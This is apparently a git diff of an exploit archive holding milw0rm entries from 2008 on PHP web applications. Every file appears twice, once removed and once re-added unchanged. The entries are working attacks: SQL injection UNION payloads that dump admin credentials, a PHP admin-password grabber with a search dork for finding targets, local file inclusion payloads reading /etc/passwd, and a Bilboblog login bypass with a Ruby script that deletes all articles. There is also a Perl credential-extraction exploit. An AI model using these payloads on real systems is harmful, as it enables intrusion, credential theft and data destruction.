-##       ###   ## ##    ## ##     ##  ##  ##  ##     ##    ##    ##     ## ##     ##
-##       ####  ## ##       ##     ##   ####   ##     ##    ##           ## ##     ##
-######   ## ## ## ##       ########     ##    ########     ##     #######  ##     ##
-##       ##  #### ##       ##   ##      ##    ##           ##           ## ##     ##
-##       ##   ### ##    ## ##    ##     ##    ##           ##    ##     ## ##     ##
-######## ##    ##  ######  ##     ##    ##    ##           ##     #######  ######## 
-
-################################ !R4Q!4N H4CK3R  ###################################
-
-ITechBids 7.0 Gold Multiple Remote Vulnerabilities
-
-Website : http://www.itechscripts.com
-
-Founded By : Encrypt3d.M!nd
-
-NOTE:I Didn't Search The Script Well,So Maybe There is other Vulnerabilities.
-
-
-# 1- Cross-site scripting (XSS):
-
-Affected File : forward_to_friend.php
-
-PoC :
-
-/forward_to_friend.php?productid=
-
-
-# 2-Remote Sql Injection(s) :
-
-Affected File(s) :
-
-sellers_othersitem.php
-classifieds.php
-shop.php
-
-Note:There is Other Files Affected But I Couldn't Exploit Them :(
-
-PoC:
-
-/sellers_othersitem.php?seller_id=666666+union+select+1,2,3,concat(user_name,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39+from+admin
-
-/classifieds.php?productid=666666+union+select+1,2,3,concat(user_name,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39+from+admin
-
-/shop.php?id=666666+union+select+1,2,3,concat(user_name,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39+from+admin
-
-
-# Greetz:
-
-MY Sweet,L!0N,EL Mariachi,-=MizO=-(:-L),Shadow Administrator,
-KoRn The Dog,Mini-Spider,All My Friends
-
-
-The EnD :D
-
-# milw0rm.com [2008-07-13]
+######## ##    ##  ######  ########  ##    ## ########  ########  #######  ######## 
+##       ###   ## ##    ## ##     ##  ##  ##  ##     ##    ##    ##     ## ##     ##
+##       ####  ## ##       ##     ##   ####   ##     ##    ##           ## ##     ##
+######   ## ## ## ##       ########     ##    ########     ##     #######  ##     ##
+##       ##  #### ##       ##   ##      ##    ##           ##           ## ##     ##
+##       ##   ### ##    ## ##    ##     ##    ##           ##    ##     ## ##     ##
+######## ##    ##  ######  ##     ##    ##    ##           ##     #######  ######## 
+
+################################ !R4Q!4N H4CK3R  ###################################
+
+ITechBids 7.0 Gold Multiple Remote Vulnerabilities
+
+Website : http://www.itechscripts.com
+
+Founded By : Encrypt3d.M!nd
+
+NOTE:I Didn't Search The Script Well,So Maybe There is other Vulnerabilities.
+
+
+# 1- Cross-site scripting (XSS):
+
+Affected File : forward_to_friend.php
+
+PoC :
+
+/forward_to_friend.php?productid=
+
+
+# 2-Remote Sql Injection(s) :
+
+Affected File(s) :
+
+sellers_othersitem.php
+classifieds.php
+shop.php
+
+Note:There is Other Files Affected But I Couldn't Exploit Them :(
+
+PoC:
+
+/sellers_othersitem.php?seller_id=666666+union+select+1,2,3,concat(user_name,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39+from+admin
+
+/classifieds.php?productid=666666+union+select+1,2,3,concat(user_name,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39+from+admin
+
+/shop.php?id=666666+union+select+1,2,3,concat(user_name,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39+from+admin
+
+
+# Greetz:
+
+MY Sweet,L!0N,EL Mariachi,-=MizO=-(:-L),Shadow Administrator,
+KoRn The Dog,Mini-Spider,All My Friends
+
+
+The EnD :D
+
+# milw0rm.com [2008-07-13]
diff --git a/platforms/php/webapps/6070.php b/platforms/php/webapps/6070.php
index f00c4591b..ee4b30a74 100755
--- a/platforms/php/webapps/6070.php
+++ b/platforms/php/webapps/6070.php
@@ -1,69 +1,69 @@
-
-
    Scripteen Free Image Hosting Script V1.2.* (cookie) Admin Password Grabber Exploit
    
-
    Coded By RMx - Liz0ziM
    
-
    Web:www.biyosecurity.com 
    
-
    Dork:"Powered by Scripteen Free Image Hosting Script V1.2"
    
-
    
-
    TARGET HOST:
-  
-  Example:www.xxxx.com
    
-
    TARGET PATH:   
-Example:/ or /scriptpath/ 
    
-
    
-

    
-Sending Exploit..
    ';
-$packet ="GET ".$p." HTTP/1.0\r\n";
-$packet.="Host: ".$host."\r\n";
-$packet.="Cookie: cookid=1\r\n";
-$packet.="Connection: Close\r\n\r\n";
-yolla($host,$packet);
-preg_match_all($desen,$veri,$cik);
-$ad=$cik[1][0];
-$sifre=$cik[1][1];
-if($ad AND $sifre){
-echo '
-Exploit succeeded...
    
-Admin Username:'.$ad.'
    
-Admin Password:'.$sifre.'
    ';
-}
-else
-{
-echo 'Exploit Failed !';
-}
-}
-
-?>
-
-# milw0rm.com [2008-07-13]
+
+
    Scripteen Free Image Hosting Script V1.2.* (cookie) Admin Password Grabber Exploit
    
+
    Coded By RMx - Liz0ziM
    
+
    Web:www.biyosecurity.com 
    
+
    Dork:"Powered by Scripteen Free Image Hosting Script V1.2"
    
+
    
+
    TARGET HOST:
+  
+  Example:www.xxxx.com
    
+
    TARGET PATH:   
+Example:/ or /scriptpath/ 
    
+
    
+

    
+Sending Exploit..
    ';
+$packet ="GET ".$p." HTTP/1.0\r\n";
+$packet.="Host: ".$host."\r\n";
+$packet.="Cookie: cookid=1\r\n";
+$packet.="Connection: Close\r\n\r\n";
+yolla($host,$packet);
+preg_match_all($desen,$veri,$cik);
+$ad=$cik[1][0];
+$sifre=$cik[1][1];
+if($ad AND $sifre){
+echo '
+Exploit succeeded...
    
+Admin Username:'.$ad.'
    
+Admin Password:'.$sifre.'
    ';
+}
+else
+{
+echo 'Exploit Failed !';
+}
+}
+
+?>
+
+# milw0rm.com [2008-07-13]
diff --git a/platforms/php/webapps/6071.txt b/platforms/php/webapps/6071.txt
index 573f3eb87..4b39d5574 100755
--- a/platforms/php/webapps/6071.txt
+++ b/platforms/php/webapps/6071.txt
@@ -1,28 +1,28 @@
-###############################################################################
-#
-#   Name    :   CodeDB (list.php lang) Local File Inclusion Vulnerability
-#   Author  :   cOndemned
-#   Greetz  :   ZaBeaTy, str0ke, irk4z, GregStar, doctor, Adish, Avantura ;*
-#
-###############################################################################
-
-Source :
-
-    // list.php
-    
-    2.  $lang = htmlspecialchars($_GET['lang']);            // ok, but.... for what ? lol
-    
-    7.  if(file_exists('templates/'.$lang.'_middle.php'))   // We'll have to cut off rest of filename & extension
-	8.      include('templates/'.$lang.'_middle.php');      // Ekhm... pwned ;d
-    
-    
-Proof of Concept :
-
-    http://[host]/[codeDB_path]/list.php?lang=../readme.txt%00
-    http://[host]/[codeDB_path]/list.php?lang=../../../../etc/passwd%00
-    http://[host]/[codeDB_path]/list.php?lang=../[local_file]%00
-
-    
-EoF.   
-
-# milw0rm.com [2008-07-14]
+###############################################################################
+#
+#   Name    :   CodeDB (list.php lang) Local File Inclusion Vulnerability
+#   Author  :   cOndemned
+#   Greetz  :   ZaBeaTy, str0ke, irk4z, GregStar, doctor, Adish, Avantura ;*
+#
+###############################################################################
+
+Source :
+
+    // list.php
+    
+    2.  $lang = htmlspecialchars($_GET['lang']);            // ok, but.... for what ? lol
+    
+    7.  if(file_exists('templates/'.$lang.'_middle.php'))   // We'll have to cut off rest of filename & extension
+	8.      include('templates/'.$lang.'_middle.php');      // Ekhm... pwned ;d
+    
+    
+Proof of Concept :
+
+    http://[host]/[codeDB_path]/list.php?lang=../readme.txt%00
+    http://[host]/[codeDB_path]/list.php?lang=../../../../etc/passwd%00
+    http://[host]/[codeDB_path]/list.php?lang=../[local_file]%00
+
+    
+EoF.   
+
+# milw0rm.com [2008-07-14]
diff --git a/platforms/php/webapps/6073.txt b/platforms/php/webapps/6073.txt
index fc248e468..56442bddf 100755
--- a/platforms/php/webapps/6073.txt
+++ b/platforms/php/webapps/6073.txt
@@ -1,195 +1,195 @@
-  ------------------------------------------------------------------
-
-  Name         :   Bilboblog 2.1 Multiples Vulnerabilities
-  Description  :   Bilboblog is a small application of micro-blogging in Php / MySQL
-  Link         :   http://www.tux-planet.fr/bilboblog-version-021-english-translation/
-
-  Vuln. types  :   Login Bypass - Cross Site Scripting - SQL Injection - Full Path Disclosure
- 
-  Conditions   :   - SQL Injection      :  Magic Quotes Off
-                   - Login Bypass, XSS  :  Register Globals On
- 
-  Credits      :   Black_H 
-
-  ------------------------------------------------------------------
-
-
-   .: I. Login Bypass
-   -------------------
- 
-   This vulnerability need register_global on.
-   The file "admin/index.php" (and most of the admin files) includes the file 'login.php' (at line 23) which contains :
- 
-   22| session_start();
-   23| $checkLogin = false;
-   24| #echo "toto".$_SESSION['admin_login']; // note: wtf ??
-   25| if(!isset($_SESSION['admin_login'])) {
-   26|
-   27|   # Check form values
-   28|   if (isset($_POST) && (!empty($_POST['admin_login'])) && (!empty($_POST['admin_passwd'])) ) {
-   29|
-   30|     # Get Session vriables
-   31|     $admin_login  = trim($_POST['admin_login']);
-   32|     $admin_passwd = trim($_POST['admin_passwd']);
-   33|
-   34|     # Check login
-   35|     if($admin_login == $login && $admin_passwd == $password) {
-   36|       $checkLogin = true;
-   37|       $_SESSION['admin_login']  = $admin_login;
-   38|      $_SESSION['admin_passwd'] = $admin_passwd;
-   39|     }
-   40|   }
-   41|
-   42| } else {
-   43|   $checkLogin = true;
-   44| }
-   45|
-   46|    22| if(!$checkLogin) {
-   47|
-   48|   # Print login form
-            [...]
-   58|     exit(0);   
-   59| }
-  
-   So, we need the session 'admin_login' ( $_SESSION['admin_login'] ) to have admin rights in all files. The script checks
-   if we have post good login and pass or not. It's look like good, but if we call directly the login.php file,
-   the $login and $password variable  are not defined. We can set them with register_globals on, valid the form with
-   the same value and so set $_SESSION['admin_login'].
-  
-   In facts, go on the page http://site.com/bilboblog/admin/login.php?login=1&password=1 and fill the forms with '1' value
-   and submit. Because checkLogin is true nothing is printed and you're  admin :)))
- 
- 
-
-   .: II. Cross Site Scripting
-   ----------------------------
-     
-        1) Permanent XSS
-       
-   When an admin  ( legitim or not :)) ) post an article, the enCode function is applied to the content :
-
-   ---- 'admin/update.php'
-  
-   25| # Check values
-   26| if(isset($_POST['content']) && $_POST['content'] != "") {
-   27| $content = enCode(substr(trim($_POST['content']), 0, $limit_post));
-        [...]
-   36| # Insert new content
-   37| $sql = "INSERT INTO $db_table VALUES ('', '".time()."', '$content');";
-   38| $result = mysql_query($sql);
- 
-   ---- 'admin/function.php'
-  
-   141| function enCode($chaine) {
-   142|
-        [...] // # Youtube & Dailymotion encode url
-   145|
-   146|  # Detect string encoding
-   147|  $encodage = mb_detect_encoding($chaine);
-   148|  if($encodage == "ASCII") $encodage = "iso-8859-1"; # Htmlentities unknown ASCII
-   149|                
-   150|  # Convert special char to html code
-   151|  $chaine = htmlentities($chaine,ENT_QUOTES,$encodage);
-   152|  $chaine = addslashes($chaine);
-   153| 
-   154|  # Return result
-   155|  return $chaine;
-   156| }
-
-   The function clean all html chars in the content that we've submit.
-   It protects the user against XSS in all pages of the blog but in the 'widget.php' file stripslashes()
-   and html_entity_decode() functions is applied to the content which is printed !
-   So je just need to get admin rights (see upper) post malicious code and share widget.php's url to the victim.
-       
-        2) Unpermanents XSS
-       
-   The file "index.php" includes the file 'head.php' (at line 21) which contains :
-
-   44| if ($_SERVER['QUERY_STRING'] != "" && intval($_SERVER['QUERY_STRING']) != "") {
-     [...]
-   55| $titleId = str2Url($liste[2], 100, 0).' - '.$title;
-   56| }
-
-   78| <?php if(!empty($titleId)) { echo $titleId; } else { echo $title; } ?>
-   79| 
- 
-   When a page is loaded, the script checks if a number is present in the url to see if she could print an article.
-   If the URL ( $_SERVER['QUERY_STRING'] ) contains a number (the id) the script load the article corresponding to the id
-   in $_SERVER['QUERY_STRING'].
- 
-   If $_SERVER['QUERY_STRING'] (the url) do not contain a number, the variable $titleId is not set and print :
-   we can define it on add a parameter titleId in the url and his value will be printed on the web page.
-   But, the variable $titleId is betwenn the  balise, so we need to add  before the malicious code.
-   We have : http://site.com/bilboblog/?titleId=TITLE
-  
-   Anyway, there are unfunny XSS in admin files and 'footer.php' :
-
-        http://site.com/bilboblog/footer.php?t_lang[lang_copyright]=XSS
-        http://site.com/bilboblog/admin/?content=XSS
-        http://site.com/bilboblog/admin/homelink.php?url=">XSS
-        http://site.com/bilboblog/admin/homelink.php?t_lang[lang_admin_help]=XSS
-        http://site.com/bilboblog/admin/homelink.php?t_lang[lang_admin_clear_cache]=XSS
-        http://site.com/bilboblog/admin/homelink.php?t_lang[lang_admin_home]=XSS
-        http://site.com/bilboblog/admin/homelink.php?t_lang[lang_admin_logout]=XSS
-       
-    and also in /admin/post.php ...
-
-   
-   
-   .: III. SQL Injection
-   ----------------------
-  
-   In admin panel, we can delete articles by sending article's id we want to supress to the script delete.php
-   which clean the id of spaces and include it in a basic sql query :
-  
-   25| # Check values
-   26| if(isset($_POST['num']) && $_POST['num'] != "") {
-   27| $article = trim($_POST['num']);
-  
-   36| # Insert new content // It's look like a copy/paste :))
-   37| $sql = "DELETE FROM $db_table WHERE num_article = '$article';";
-   38| $result = mysql_query($sql);  
-  
-   So, with magic_quotes off, we can inject sql code in the query and, by example, delete all entries
-   (all articles) in the database.
-   To delete all entries, we must send a post request to delete.php, for the poc see at the end of file.
- 
- 
- 
-   .: IV. Full Path Disclosure
-   ----------------------------
-  
-   And to finish, the are to FPD which can be exploited for a server attack or in sql injection :
-        http://localhost/Audits/bilboblog/footer.php?enable_cache=false
-        http://localhost/Audits/bilboblog/pagination.php // don't need any conditions
-   
-   
-   
-   .: Õ. SQL INJECTION POC (Ruby)
-   ---------------------------------------
-
-   # -- CUT
-
-   # Config
-   host = 'site.com'
-   path = '/bilboblog/'
-   # -- End
-
-   require 'net/http'
-   http = Net::HTTP.new(host)
-
-   data = { 0 => "admin_login=1&admin_passwd=1", 1 => "num=-1'  OR num_article > 0#" }
-   resp = http.post(path+'admin/login.php?login=1&password=1', data[0])
-
-   cookie = {  'Cookie' => resp.response['set-cookie'] }
-   resp = http.post(path+'admin/delete.php', data[1], cookie)
-   if(resp.code.to_s == '302') : puts 'Done !' end
-
-
-   # -- EOF
-  
-       
-   Black_H  - blackh.eu
-   http://blackh.eu/Advisories/Billboblog_2.1_Advisories.txt
-
-# milw0rm.com [2008-07-14]
+  ------------------------------------------------------------------
+
+  Name         :   Bilboblog 2.1 Multiples Vulnerabilities
+  Description  :   Bilboblog is a small application of micro-blogging in Php / MySQL
+  Link         :   http://www.tux-planet.fr/bilboblog-version-021-english-translation/
+
+  Vuln. types  :   Login Bypass - Cross Site Scripting - SQL Injection - Full Path Disclosure
+ 
+  Conditions   :   - SQL Injection      :  Magic Quotes Off
+                   - Login Bypass, XSS  :  Register Globals On
+ 
+  Credits      :   Black_H 
+
+  ------------------------------------------------------------------
+
+
+   .: I. Login Bypass
+   -------------------
+ 
+   This vulnerability need register_global on.
+   The file "admin/index.php" (and most of the admin files) includes the file 'login.php' (at line 23) which contains :
+ 
+   22| session_start();
+   23| $checkLogin = false;
+   24| #echo "toto".$_SESSION['admin_login']; // note: wtf ??
+   25| if(!isset($_SESSION['admin_login'])) {
+   26|
+   27|   # Check form values
+   28|   if (isset($_POST) && (!empty($_POST['admin_login'])) && (!empty($_POST['admin_passwd'])) ) {
+   29|
+   30|     # Get Session vriables
+   31|     $admin_login  = trim($_POST['admin_login']);
+   32|     $admin_passwd = trim($_POST['admin_passwd']);
+   33|
+   34|     # Check login
+   35|     if($admin_login == $login && $admin_passwd == $password) {
+   36|       $checkLogin = true;
+   37|       $_SESSION['admin_login']  = $admin_login;
+   38|      $_SESSION['admin_passwd'] = $admin_passwd;
+   39|     }
+   40|   }
+   41|
+   42| } else {
+   43|   $checkLogin = true;
+   44| }
+   45|
+   46|    22| if(!$checkLogin) {
+   47|
+   48|   # Print login form
+            [...]
+   58|     exit(0);   
+   59| }
+  
+   So, we need the session 'admin_login' ( $_SESSION['admin_login'] ) to have admin rights in all files. The script checks
+   if we have post good login and pass or not. It's look like good, but if we call directly the login.php file,
+   the $login and $password variable  are not defined. We can set them with register_globals on, valid the form with
+   the same value and so set $_SESSION['admin_login'].
+  
+   In facts, go on the page http://site.com/bilboblog/admin/login.php?login=1&password=1 and fill the forms with '1' value
+   and submit. Because checkLogin is true nothing is printed and you're  admin :)))
+ 
+ 
+
+   .: II. Cross Site Scripting
+   ----------------------------
+     
+        1) Permanent XSS
+       
+   When an admin  ( legitim or not :)) ) post an article, the enCode function is applied to the content :
+
+   ---- 'admin/update.php'
+  
+   25| # Check values
+   26| if(isset($_POST['content']) && $_POST['content'] != "") {
+   27| $content = enCode(substr(trim($_POST['content']), 0, $limit_post));
+        [...]
+   36| # Insert new content
+   37| $sql = "INSERT INTO $db_table VALUES ('', '".time()."', '$content');";
+   38| $result = mysql_query($sql);
+ 
+   ---- 'admin/function.php'
+  
+   141| function enCode($chaine) {
+   142|
+        [...] // # Youtube & Dailymotion encode url
+   145|
+   146|  # Detect string encoding
+   147|  $encodage = mb_detect_encoding($chaine);
+   148|  if($encodage == "ASCII") $encodage = "iso-8859-1"; # Htmlentities unknown ASCII
+   149|                
+   150|  # Convert special char to html code
+   151|  $chaine = htmlentities($chaine,ENT_QUOTES,$encodage);
+   152|  $chaine = addslashes($chaine);
+   153| 
+   154|  # Return result
+   155|  return $chaine;
+   156| }
+
+   The function clean all html chars in the content that we've submit.
+   It protects the user against XSS in all pages of the blog but in the 'widget.php' file stripslashes()
+   and html_entity_decode() functions is applied to the content which is printed !
+   So je just need to get admin rights (see upper) post malicious code and share widget.php's url to the victim.
+       
+        2) Unpermanents XSS
+       
+   The file "index.php" includes the file 'head.php' (at line 21) which contains :
+
+   44| if ($_SERVER['QUERY_STRING'] != "" && intval($_SERVER['QUERY_STRING']) != "") {
+     [...]
+   55| $titleId = str2Url($liste[2], 100, 0).' - '.$title;
+   56| }
+
+   78| <?php if(!empty($titleId)) { echo $titleId; } else { echo $title; } ?>
+   79| 
+ 
+   When a page is loaded, the script checks if a number is present in the url to see if she could print an article.
+   If the URL ( $_SERVER['QUERY_STRING'] ) contains a number (the id) the script load the article corresponding to the id
+   in $_SERVER['QUERY_STRING'].
+ 
+   If $_SERVER['QUERY_STRING'] (the url) do not contain a number, the variable $titleId is not set and print :
+   we can define it on add a parameter titleId in the url and his value will be printed on the web page.
+   But, the variable $titleId is betwenn the  balise, so we need to add  before the malicious code.
+   We have : http://site.com/bilboblog/?titleId=TITLE
+  
+   Anyway, there are unfunny XSS in admin files and 'footer.php' :
+
+        http://site.com/bilboblog/footer.php?t_lang[lang_copyright]=XSS
+        http://site.com/bilboblog/admin/?content=</textarea>XSS
+        http://site.com/bilboblog/admin/homelink.php?url=">XSS
+        http://site.com/bilboblog/admin/homelink.php?t_lang[lang_admin_help]=XSS
+        http://site.com/bilboblog/admin/homelink.php?t_lang[lang_admin_clear_cache]=XSS
+        http://site.com/bilboblog/admin/homelink.php?t_lang[lang_admin_home]=XSS
+        http://site.com/bilboblog/admin/homelink.php?t_lang[lang_admin_logout]=XSS
+       
+    and also in /admin/post.php ...
+
+   
+   
+   .: III. SQL Injection
+   ----------------------
+  
+   In admin panel, we can delete articles by sending article's id we want to supress to the script delete.php
+   which clean the id of spaces and include it in a basic sql query :
+  
+   25| # Check values
+   26| if(isset($_POST['num']) && $_POST['num'] != "") {
+   27| $article = trim($_POST['num']);
+  
+   36| # Insert new content // It's look like a copy/paste :))
+   37| $sql = "DELETE FROM $db_table WHERE num_article = '$article';";
+   38| $result = mysql_query($sql);  
+  
+   So, with magic_quotes off, we can inject sql code in the query and, by example, delete all entries
+   (all articles) in the database.
+   To delete all entries, we must send a post request to delete.php, for the poc see at the end of file.
+ 
+ 
+ 
+   .: IV. Full Path Disclosure
+   ----------------------------
+  
+   And to finish, the are to FPD which can be exploited for a server attack or in sql injection :
+        http://localhost/Audits/bilboblog/footer.php?enable_cache=false
+        http://localhost/Audits/bilboblog/pagination.php // don't need any conditions
+   
+   
+   
+   .: Õ. SQL INJECTION POC (Ruby)
+   ---------------------------------------
+
+   # -- CUT
+
+   # Config
+   host = 'site.com'
+   path = '/bilboblog/'
+   # -- End
+
+   require 'net/http'
+   http = Net::HTTP.new(host)
+
+   data = { 0 => "admin_login=1&admin_passwd=1", 1 => "num=-1'  OR num_article > 0#" }
+   resp = http.post(path+'admin/login.php?login=1&password=1', data[0])
+
+   cookie = {  'Cookie' => resp.response['set-cookie'] }
+   resp = http.post(path+'admin/delete.php', data[1], cookie)
+   if(resp.code.to_s == '302') : puts 'Done !' end
+
+
+   # -- EOF
+  
+       
+   Black_H  - blackh.eu
+   http://blackh.eu/Advisories/Billboblog_2.1_Advisories.txt
+
+# milw0rm.com [2008-07-14]
diff --git a/platforms/php/webapps/6074.txt b/platforms/php/webapps/6074.txt
index c7e410d01..abab691bf 100755
--- a/platforms/php/webapps/6074.txt
+++ b/platforms/php/webapps/6074.txt
@@ -1,70 +1,70 @@
-########################## www.BugReport.ir #########################
-#
-#      AmnPardaz Security Research Team
-#
-# Title: Pluck Local File inclusion
-# Vendor: http://www.pluck-cms.org
-# Bug: Local File Inclusion
-# Vulnerable Version: 4.5.1 (prior versions also may be affected)
-# Exploitation: Remote with browser
-# Fix: N/A
-###################################################################
-
-
-####################
-- Description:
-####################
-
-Pluck is a content management system, written in php.
-
-
-####################
-- Vulnerability:
-####################
-
-+--> Local File Inclusion
-
-Input passed to multiple parameters in "predefined_variables.php" are not properly verified 
-before being used to include files.
-This can be exploited to include arbitrary files from local resources.
-
-Code Snippet:
-/data/inc/themes/predefined_variables.php #line:15-38
-
-//Include Translation data
-include ("data/settings/langpref.php");
-include ("data/inc/lang/$langpref");
-//Get Site-title
-$sitetitle = file_get_contents("data/settings/title.dat");
-
-//Get the page-data
-$filetoread = $_GET['file'];
-$album = $_GET['album'];
-$blogpost = $_GET['blogpost'];
-$cat = $_GET['cat'];
-
-if (($filetoread) && (file_exists("data/content/$filetoread"))) {
-include "data/content/$filetoread"; }
-
-elseif ($album) {
-$title = $album; }
-
-elseif ($blogpost) {
-include("data/blog/$cat/posts/$blogpost"); }
-
-elseif ((!file_exists("data/content/$filetoread")) && (!$album) && (!$blogpost)) {
-$title = $lang_front1;
-$content = $lang_front2; }
-
-
-POC: http://localhost/pluck-4_5_1/data/inc/themes/predefined_variables.php?blogpost=../../../../../../../../boot.ini
-
-####################
-- Credit :
-####################
-AmnPardaz Security Research Team
-Contact: admin[4t}bugreport{d0t]ir
-www.BugReport.ir
-www.AmnPardaz.comz
-
-# milw0rm.com [2008-07-14]
+########################## www.BugReport.ir #########################
+#
+#      AmnPardaz Security Research Team
+#
+# Title: Pluck Local File inclusion
+# Vendor: http://www.pluck-cms.org
+# Bug: Local File Inclusion
+# Vulnerable Version: 4.5.1 (prior versions also may be affected)
+# Exploitation: Remote with browser
+# Fix: N/A
+###################################################################
+
+
+####################
+- Description:
+####################
+
+Pluck is a content management system, written in php.
+
+
+####################
+- Vulnerability:
+####################
+
++--> Local File Inclusion
+
+Input passed to multiple parameters in "predefined_variables.php" are not properly verified 
+before being used to include files.
+This can be exploited to include arbitrary files from local resources.
+
+Code Snippet:
+/data/inc/themes/predefined_variables.php #line:15-38
+
+//Include Translation data
+include ("data/settings/langpref.php");
+include ("data/inc/lang/$langpref");
+//Get Site-title
+$sitetitle = file_get_contents("data/settings/title.dat");
+
+//Get the page-data
+$filetoread = $_GET['file'];
+$album = $_GET['album'];
+$blogpost = $_GET['blogpost'];
+$cat = $_GET['cat'];
+
+if (($filetoread) && (file_exists("data/content/$filetoread"))) {
+include "data/content/$filetoread"; }
+
+elseif ($album) {
+$title = $album; }
+
+elseif ($blogpost) {
+include("data/blog/$cat/posts/$blogpost"); }
+
+elseif ((!file_exists("data/content/$filetoread")) && (!$album) && (!$blogpost)) {
+$title = $lang_front1;
+$content = $lang_front2; }
+
+
+POC: http://localhost/pluck-4_5_1/data/inc/themes/predefined_variables.php?blogpost=../../../../../../../../boot.ini
+
+####################
+- Credit :
+####################
+AmnPardaz Security Research Team
+Contact: admin[4t}bugreport{d0t]ir
+www.BugReport.ir
+www.AmnPardaz.comz
+
+# milw0rm.com [2008-07-14]
diff --git a/platforms/php/webapps/6075.txt b/platforms/php/webapps/6075.txt
index 511cab9e8..da6e3fcae 100755
--- a/platforms/php/webapps/6075.txt
+++ b/platforms/php/webapps/6075.txt
@@ -1,68 +1,68 @@
---==+============================================================================+==--
---==+   Galatolo Web Manager 1.3a <= XSS / Remote SQL Injection Vulnerability    +==--    
---==+============================================================================+==--
-
- [*] Discovered By: StAkeR ~ StAkeR@hotmail.it
- [+] Discovered On: 14 Jul 2008
- [+] Download: http://gwm.dev-area.org/view.php?id=8
-
- [*] Vulnerabilities:
- 
- [*] XSS <= 1.3a
- [+] all.php?tag= [Code Javascript]
- [+] http://site.com/all.php?tag=
- 
- [*] SQL (plugin users) 1.3a
- [+] plugins/users/index.php?id= [Code SQL]
- [+] -1+union+select+null,concat(user,0x3a,pass),null,concat(user(),0x3a,database(),0x3a,version())+from+users+where+id=1--
- 
- [*] Exploit:
-
- #!/usr/bin/perl 
- use strict;
- use LWP::UserAgent;
-
- my $host = shift;
- my ($start,$content,@login);
- my $evilxx = "/plugins/users/index.php?id=-1+union+select+1,concat(0x25,user,0x25,pass),null,null+from+users+where+id=1--";
-
- if($host =~ /^http:\/\/?/i)
- {
-   $start = new LWP::UserAgent or die "[+] Unable to connect\n";
-   $start->timeout(1);
-   $start->agent("Mozilla/4.0 (compatible; Lotus-Notes/5.0; Windows-NT)");
-   $content = $start->get($host.$evilxx);
-  
-   if($content->is_success)
-   {
-     if($content->content =~ /%(.+?)%([0-9a-f]{32})/)
-     {
-       push(@login,$1,$2);
-       print "[+] Login:\n";
-       print "[+] Username: $login[0]\n";
-       print "[+] Password: $login[1]\n\n";
-      
-       print "[+] Cookie Session:\n";
-       print "[+] gwm_user = $login[0]\n";
-       print "[+] gwm_pass = $login[1]\n\n";
-      
-       print "[+] Crack Password:\n";
-       print "[+] md5(md5(password)) for crack:\n"; 
-       print "[+] http://passcracking.com\n";
-     }
-     else
-     {
-       print "[+] Exploit Failed\n";
-       print "[+] Site Not Vulnerable\n";
-     }
-   }
- }
- else
- {
-   print "[+] Galatolo Web Manager (plugin users) 1.3 Remote SQL Injection\n";
-   print "[+] Exploit Coded By: StAkeR ~ StAkeR\@hotmail.it\n\n";
-   print "[+] Usage: Perl $0 \n";
-   print "[+] Usage: Perl $0 http://site.com\n";
- }
-
-# milw0rm.com [2008-07-15]
+--==+============================================================================+==--
+--==+   Galatolo Web Manager 1.3a <= XSS / Remote SQL Injection Vulnerability    +==--    
+--==+============================================================================+==--
+
+ [*] Discovered By: StAkeR ~ StAkeR@hotmail.it
+ [+] Discovered On: 14 Jul 2008
+ [+] Download: http://gwm.dev-area.org/view.php?id=8
+
+ [*] Vulnerabilities:
+ 
+ [*] XSS <= 1.3a
+ [+] all.php?tag= [Code Javascript]
+ [+] http://site.com/all.php?tag=
+ 
+ [*] SQL (plugin users) 1.3a
+ [+] plugins/users/index.php?id= [Code SQL]
+ [+] -1+union+select+null,concat(user,0x3a,pass),null,concat(user(),0x3a,database(),0x3a,version())+from+users+where+id=1--
+ 
+ [*] Exploit:
+
+ #!/usr/bin/perl 
+ use strict;
+ use LWP::UserAgent;
+
+ my $host = shift;
+ my ($start,$content,@login);
+ my $evilxx = "/plugins/users/index.php?id=-1+union+select+1,concat(0x25,user,0x25,pass),null,null+from+users+where+id=1--";
+
+ if($host =~ /^http:\/\/?/i)
+ {
+   $start = new LWP::UserAgent or die "[+] Unable to connect\n";
+   $start->timeout(1);
+   $start->agent("Mozilla/4.0 (compatible; Lotus-Notes/5.0; Windows-NT)");
+   $content = $start->get($host.$evilxx);
+  
+   if($content->is_success)
+   {
+     if($content->content =~ /%(.+?)%([0-9a-f]{32})/)
+     {
+       push(@login,$1,$2);
+       print "[+] Login:\n";
+       print "[+] Username: $login[0]\n";
+       print "[+] Password: $login[1]\n\n";
+      
+       print "[+] Cookie Session:\n";
+       print "[+] gwm_user = $login[0]\n";
+       print "[+] gwm_pass = $login[1]\n\n";
+      
+       print "[+] Crack Password:\n";
+       print "[+] md5(md5(password)) for crack:\n"; 
+       print "[+] http://passcracking.com\n";
+     }
+     else
+     {
+       print "[+] Exploit Failed\n";
+       print "[+] Site Not Vulnerable\n";
+     }
+   }
+ }
+ else
+ {
+   print "[+] Galatolo Web Manager (plugin users) 1.3 Remote SQL Injection\n";
+   print "[+] Exploit Coded By: StAkeR ~ StAkeR\@hotmail.it\n\n";
+   print "[+] Usage: Perl $0 \n";
+   print "[+] Usage: Perl $0 http://site.com\n";
+ }
+
+# milw0rm.com [2008-07-15]
diff --git a/platforms/php/webapps/6076.txt b/platforms/php/webapps/6076.txt
index 7bdfa1893..293b81724 100755
--- a/platforms/php/webapps/6076.txt
+++ b/platforms/php/webapps/6076.txt
@@ -1,45 +1,45 @@
-   ====================================================
-   | pSys v0.7.0 Alpha Multiple Remote File Include   
-   |     (works only with register_globals = on)      
-   |        Founded By rXh RoMaNTiC-TeaM              
-   ====================================================
-
-[!] Discovered.:                           RoMaNcYxHaCkEr
-[!] Vendor.....:                            http://www.powie.de
-[!] My Homepage...:                    WwW.4RxH.CoM
